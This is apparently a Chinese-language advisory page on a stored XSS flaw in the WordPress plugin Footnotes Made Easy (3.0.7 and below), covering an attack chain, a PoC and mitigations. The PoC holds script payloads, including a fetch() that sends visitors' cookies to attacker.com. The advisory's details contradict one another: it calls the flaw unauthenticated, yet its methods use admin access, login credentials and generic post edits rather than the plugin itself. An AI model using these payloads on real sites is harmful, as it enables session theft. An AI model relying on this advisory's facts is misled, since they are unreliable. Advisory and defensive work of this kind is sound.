CVE-2025-11733 WordPress Footnotes Made Easy插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11733

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Footnotes Made Easy插件 for WordPress

漏洞概述

CVE-2025-11733是WordPress插件Footnotes Made Easy中的一个高危安全漏洞。该插件版本至3.0.7存在存储型跨站脚本攻击（Stored Cross-Site Scripting）漏洞，根源在于插件设置功能中输入验证和输出转义机制不足。攻击者无需任何认证凭证即可利用此漏洞，在WordPress页面的插件配置区域注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含注入代码的页面时，恶意脚本将在其浏览器上下文中执行。这可能导致会话劫持、敏感信息窃取、恶意重定向等严重安全后果。该漏洞CVSS评分7.2，属于高危级别，影响范围涵盖所有使用该插件的WordPress网站。

技术细节

该漏洞存在于Footnotes Made Easy插件3.0.7及以下版本的插件设置处理逻辑中。具体问题在于插件在处理用户输入的脚注（footnotes）内容时，未能对特殊字符进行充分的输入消毒（input sanitization）和输出转义（output escaping）。攻击者可以通过插件设置页面或相关API接口，提交包含恶意JavaScript代码的脚注内容。由于缺乏适当的输入验证，这些恶意代码会被直接存储到WordPress数据库中。当其他用户访问包含该脚注的页面时，服务器会从数据库读取并输出这些未转义的内容，浏览器将其作为可执行脚本解析执行。攻击者可利用此漏洞窃取用户Cookie、会话令牌，执行任意客户端操作，或进行钓鱼攻击。由于该插件通常在文章内容区域显示脚注，几乎所有访问相关页面的用户都会受到攻击影响。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用Footnotes Made Easy插件

STEP 2

步骤2

攻击者通过插件设置页面、REST API或XML-RPC接口提交包含恶意JavaScript代码的脚注内容

STEP 3

步骤3

由于插件缺乏输入消毒，恶意脚本被直接存储到WordPress数据库中

STEP 4

步骤4

当普通用户访问包含该脚注的页面时，服务器从数据库读取未转义的内容

STEP 5

步骤5

用户浏览器将恶意内容作为可执行脚本解析执行，导致Cookie窃取、会话劫持或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11733 PoC - Stored XSS in Footnotes Made Easy plugin -->
<!-- Attack Vector: Inject malicious script via plugin settings -->

<!-- Method 1: Via Plugin Settings -->
<!-- Navigate to WordPress admin > Footnotes Made Easy settings -->
<!-- Insert the following payload in any footnote field: -->
<script>alert(document.cookie)</script>

<!-- Method 2: Via WordPress REST API -->
<!-- POST /wp-json/wp/v2/posts/{id} -->
{
  "content": "Test footnote<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"
}

<!-- Method 3: Via XML-RPC -->
<!-- POST /xmlrpc.php -->
<methodCall>
  <methodName>wp.newPost</methodName>
  <params>
    <param><value><string>username</string></value></param>
    <param><value><string>password</string></value></param>
    <param><value><struct>
      <member><name>post_content</name><value><string>[ footnote ]<script>alert('XSS')</script>[/footnote]</string></value></member>
    </struct></value></param>
  </params>
</methodCall>

<!-- Exploitation Result: Stored script executes on page load for all visitors -->

影响范围

Footnotes Made Easy plugin ≤ 3.0.7

防御指南

临时缓解措施

在官方安全补丁发布之前，可采取以下临时缓解措施：1）暂时禁用Footnotes Made Easy插件或替换为类似功能的安全插件；2）使用Web应用防火墙（WAF）规则阻止包含<script>标签的请求；3）限制WordPress REST API和XML-RPC接口的访问权限；4）加强WordPress用户权限管理，确保只有可信用户能够编辑内容；5）部署严格的Content Security Policy头部限制脚本执行来源。